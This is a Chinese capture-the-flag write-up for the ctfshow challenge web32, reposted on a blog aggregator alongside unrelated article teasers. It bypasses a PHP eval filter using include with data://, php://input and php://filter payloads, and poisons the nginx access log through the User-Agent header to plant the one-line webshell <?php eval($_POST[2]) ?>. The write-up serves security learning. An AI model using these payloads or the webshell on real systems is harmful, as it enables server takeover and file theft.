[ctfshow web入门] web32

前置知识

协议相关博客:https://blog.csdn.net/m0_73353130/article/details/136212770
includeinclude "filename"这是最常用的方法,除此之外还可以 include url,被包含的文件会被当做代码执行。
data://: PHP 支持的一种数据流协议,用于将数据直接嵌入到代码中。相关博客:data://协议
data://text/plain:要求按照文本格式将内容嵌入代码中,使用方法:data://text/plain,content
php://input:读取原始的POST数据,只能读一次。详情看这里https://docs.pingcode.com/ask/45614.html
php://filter:过滤器,以一定的规则处理要读写的文件。详情:https://blog.51cto.com/u_16248628/7588596

user-agent:一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

信息收集

更多的过滤,我大概猜测一下每一个过滤的用意
flag:不能直接输入文件名
system:不许使用system函数
php:不许输入flag.php,不能使用<?php ?>
cat:不许执行系统指令cat
sort:系统命令,将文本内容排序后输出,类似cat
shell:不许使用shell_exec
.:不许使用flag.php,不许使用字符拼接,php中可以用.拼接字符串例如 $a="12" $b="34" $a.$b==="1234"
空格:系统命令中多需要空格,例如tac flag.php
':不允许自定义字符串
`(反引号):不允许使用shell命令。`ls` 效果等同于shell_exec('ls')
echo:不允许使用echo打印
;:不允许使用;在代码结尾,这使得函数执行更为困难了
(:不允许使用函数
/i:忽略大小写

error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

解题

如果需要使用空格,那么参看 ASCII码表, %09-%0D上只要有一个能够使用,那么就能绕过空格过滤,例如:tac%0aflag.php,推荐使用最常用的%0a
不能使用函数了,因为括号被限制了。连 ` 也被限制了,系统命令也不行了
include是不需要括号的,所以我们可以考虑从include入手。

发现一个好玩的东西:这里为什么一定要加一个函数而不是直接类如?c=$_GET["1"]?>&1=xxx;呢,原因是
例如c=$_GET[1]&1=echo 123;eval($_GET[c])eval("$_GET[1]")"echo 123;",第一次系统自动换算$_GET[c],第二次使用eval解析字符串 "$_GET[1]",得到结果echo 123;

方法1.1

方法1将以协议相关的方法进行尝试

下面语句的意思是
eval($_GET[c]);eval("include$_GET[1]")include$_GET[1]include "data://text/plain,<?php system("tac flag.php") ?>"<?php system("tac flag.php") ?>

?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php") ?>

其中?>利用了php的机制,当遇到?>时会自动添加一个;,也就是说<?php ehco 123 ?><?php ehco 123; ?>等效。我们利用这个机制绕过;的过滤。
使用$_GET[1]中转一次是因为太多东西被过滤了,非常不方便

在这里插入图片描述


方法1.2

下面语句的意思是
eval($_GET[c]);eval("include$_GET[1]")include$_GET[1]include php://input

?c=include$_GET[1]?>&1=php://input

post:

<?php system('ls')?>

在使用google的hackbar时需要注意,使用raw模式,basic模式下后台无法获取到不带=的post数据。
原因:https://github.com/0140454/hackbar/issues/56

在这里插入图片描述


方法1.3

这一类方法的主要目的是读取文件,并让<?php标签失效,以文本显示代码
将flag.php以base64加密的方法读取,这会将一串base64显示到页面上,拿去解密即可获取flag

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

类似的,把ascii编码变成utf-16编码

?c=include$_GET[1]?>&1=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php

方法2

user-agent
之前都是使用过滤器,那么不用过滤器行不行,当然行啊,不行我肯定不写出来了。
我们包含/var/log/nginx/access.log
你问为什么我知道是这个目录
apache日志存放路径:/var/log/apache/access.log
Ngnix日志存放路径:/var/log/nginx/access.log/var/log/nginx/error.log
没有放这里或者没开启日志,那就用不了
在这里插入图片描述

有没有发现这个玩意很熟悉,这不就是user-agent

利用原理:每次都会将user-agent写入日志里,如果传入的日志里有恶意代码,也会被写道日志里,但代码此时并不会被运行。由于我们使用了include包含日志文件,日志文件中的<?php ... ?>标签中的代码会被当做代码执行,而其他文本当做普通文本显示。

写一句话木马

<?php eval($_POST[2]) ?>

然后拿蚁剑连接它,之前想要直接用system(“tac flag.php”)的,没反应,只能蚁剑连,原因不详。
蚁剑使用参看[ctfshow web入门] web31
在这里插入图片描述
蚁剑连接,接不上url写成http没有s,一句话木马写$_REQUEST或者$_POST,不要用$_GET

url/?c=include$_GET[1]?>&1=/var/log/nginx/access.log
密码:2    因为$_POST[2]

在这里插入图片描述

web31    目录    web33

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/900794.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

kotlin中const 和val的区别

在 Kotlin 中&#xff0c;const 和 val 都是用来声明常量的&#xff0c;但它们的使用场景和功能有所不同&#xff1a; 1. val: val 用于声明只读变量&#xff0c;也就是不可修改的变量&#xff08;类似于 Java 中的 final 变量&#xff09;。它可以是任何类型&#xff0c;包括…

【STM32】综合练习——智能风扇系统

目录 0 前言 1 硬件准备 2 功能介绍 3 前置配置 3.1 时钟配置 3.2 文件配置 4 功能实现 4.1 按键功能 4.2 屏幕功能 4.3 调速功能 4.4 倒计时功能 4.5 摇头功能 4.6 测距待机功能 0 前言 由于时间关系&#xff0c;暂停详细更新&#xff0c;本文章中&#xff0c;…

任务扩展-输入商品原价,折扣并计算促销后的价格

1.在HbuilderX软件中创建项目&#xff0c;把项目的路径放在xampp中的htdocs 2.创建php文件&#xff1a;price.php,price_from.php 3.在浏览器中&#xff0c;运行项目效果&#xff0c;通过xampp中admin进行运行浏览&#xff0c;在后添加文件名称即可&#xff0c;注意&#xff…

3D Gaussian Splatting as MCMC 与gsplat中的应用实现

3D高斯泼溅(3D Gaussian splatting)自2023年提出以后,相关研究paper井喷式增长,尽管出现了许多改进版本,但依旧面临着诸多挑战,例如实现照片级真实感、应对高存储需求,而 “悬浮的高斯核” 问题就是其中之一。浮动高斯核通常由输入图像中的曝光或颜色不一致引发,也可能…

【软件测试】Postman中如何搭建Mock服务

在 Postman 中&#xff0c;Mock 服务是一项非常有用的功能&#xff0c;允许你在没有实际后端服务器的情况下模拟 API 响应。通过创建 Mock 服务&#xff0c;你可以在开发阶段或测试中模拟 API 的行为&#xff0c;帮助团队成员进行前端开发、API 测试和集成测试等工作。 Mock 服…

Spring-MVC

Spring-MVC 1.SpringMVC简介 - SpringMVC概述 SpringMVC是一个基于Spring开发的MVC轻量级框架&#xff0c;Spring3.0后发布的组件&#xff0c;SpringMVC和Spring可以无缝整合&#xff0c;使用DispatcherServlet作为前端控制器&#xff0c;且内部提供了处理器映射器、处理器适…

关于Spring MVC中@RequestParam注解的详细说明,用于在前后端参数名称不一致时实现参数映射。包含代码示例和总结表格

以下是关于Spring MVC中RequestParam注解的详细说明&#xff0c;用于在前后端参数名称不一致时实现参数映射。包含代码示例和总结表格&#xff1a; 1. 核心作用 RequestParam用于显式绑定HTTP请求参数到方法参数&#xff0c;支持以下场景&#xff1a; 参数名不一致&#xff1…

MySQL主从复制技术详解:原理、实现与最佳实践

目录 引言&#xff1a;MySQL主从复制的技术基础 MySQL主从复制的实现机制 复制架构与线程模型 复制连接建立过程 数据变更与传输流程 MySQL不同复制方式的特点与适用场景 异步复制&#xff08;Asynchronous Replication&#xff09; 全同步复制&#xff08;Fully Synch…

ROS Master多设备连接

Bash Shell Shell是位于用户与操作系统内核之间的桥梁&#xff0c;当用户在终端敲入命令后&#xff0c;这些输入首先会进入内核中的tty子系统&#xff0c;TTY子系统负责捕获并处理终端的输入输出流&#xff0c;确保数据正确无误的在终端和系统内核之中。Shell在此过程不仅仅是…

Trae + LangGPT 生成结构化 Prompt

Trae LangGPT 生成结构化 Prompt 0. 引言1. 安装 Trae2. 克隆 LangGPT3. Trae 和 LangGPT 联动4. 集成到 Dify 中 0. 引言 Github 上 LangGPT 这个项目&#xff0c;主要向我们介绍了写结构化Prompt的一些方法和示例&#xff0c;我们怎么直接使用这个项目&#xff0c;辅助我们…

《安富莱嵌入式周报》第352期:手持开源终端,基于参数阵列的定向扬声器,炫酷ASCII播放器,PCB电阻箱,支持1Ω到500KΩ,Pebble智能手表代码重构

周报汇总地址&#xff1a;嵌入式周报 - uCOS & uCGUI & emWin & embOS & TouchGFX & ThreadX - 硬汉嵌入式论坛 - Powered by Discuz! 视频版 https://www.bilibili.com/video/BV1DEf3YiEqE/ 《安富莱嵌入式周报》第352期&#xff1a;手持开源终端&#x…

python 浅拷贝copy与深拷贝deepcopy 理解

一 浅拷贝与深拷贝 1. 浅拷贝 浅拷贝只复制了对象本身&#xff08;即c中的引用&#xff09;。 2. 深拷贝 深拷贝创建一个新的对象&#xff0c;同时也会创建所有子对象的副本&#xff0c;因此新对象与原对象之间完全独立。 二 代码理解 1. 案例一 a 10 b a b 20 print…

day22 学习笔记

文章目录 前言一、遍历1.行遍历2.列遍历3.直接遍历 二、排序三、去重四、分组 前言 通过今天的学习&#xff0c;我掌握了对Pandas的数据类型进行基本操作&#xff0c;包括遍历&#xff0c;去重&#xff0c;排序&#xff0c;分组 一、遍历 1.行遍历 intertuples方法用于遍历D…

SpringMVC的请求-文件上传

文件上传客户端三要素 1. 表单项type“file” 2. 表单的提交方式是post 3. 表单的enctype属性是多部分表单形式&#xff0c;及enctype“multipart/form-data” <% page contentType"text/html;charsetUTF-8" language"java" %> <html> <he…

在Ubuntu系统如何让MySQL服务器支持远程连接

目录 问题描述 解决方案 步骤一&#xff1a;检查MySQL配置文件 ​编辑 步骤二&#xff1a;修改bind-address参数 ​编辑 步骤三&#xff1a;重启MySQL服务 步骤四&#xff1a;验证更改 步骤五&#xff1a;检查防火墙设置 步骤六&#xff1a;测试远程连接 注意事项 …

JSON工具-JSONUtil

对象转JSON JSONUtil.toJsonStr可以将任意对象&#xff08;Bean、Map、集合等&#xff09;直接转换为JSON字符串。 如果对象是有序的Map等对象&#xff0c;则转换后的JSON字符串也是有序的。 //region 处理POST请求&#xff0c;将TreeMap转换为JSON字符串返回/*** 处理POST请求…

死锁 手撕死锁检测工具

目录 引言 一.理论联立 1.死锁的概念和原因 2.死锁检测的基本思路 3.有向图在死锁检测中的应用 二.代码实现案例&#xff08;我们会介绍部分重要接口解释&#xff09; 1.我们定义一个线性表来存线程ID和锁ID 2.表中数据的查询接口 3.表中数据的删除接口 4.表中数据的添…

Java 中 SQL 注入问题剖析​

一、引言​ 在当今数字化时代&#xff0c;数据是企业和组织的核心资产之一。许多应用程序都依赖于数据库来存储和管理数据&#xff0c;而 Java 作为一种广泛使用的编程语言&#xff0c;常被用于开发与数据库交互的应用程序。然而&#xff0c;SQL 注入这一安全漏洞却如同隐藏在…

安全理念和安全产品发展史

从安全理念的发展历史来看,技术与产品的演进始终围绕 “威胁对抗” 与 “业务适配” 两大核心展开。以下从七个关键阶段解析安全技术与产品的发展脉络,并结合最新实践与未来趋势提供深度洞察: 一、密码学奠基阶段(1970s 前) 安全理念:以 “信息保密” 为核心,防御手段…

【Ansible自动化运维】二、Playbook 深入探究:构建复杂自动化流程

​ 在 Ansible 自动化运维体系中&#xff0c;Playbook 是极为关键的部分。它允许我们以一种结构化、可重复的方式定义和执行一系列复杂的任务&#xff0c;从而构建高效的自动化流程。本篇文章将深入探究 Ansible Playbook 的各个方面&#xff0c;助您掌握构建复杂自动化…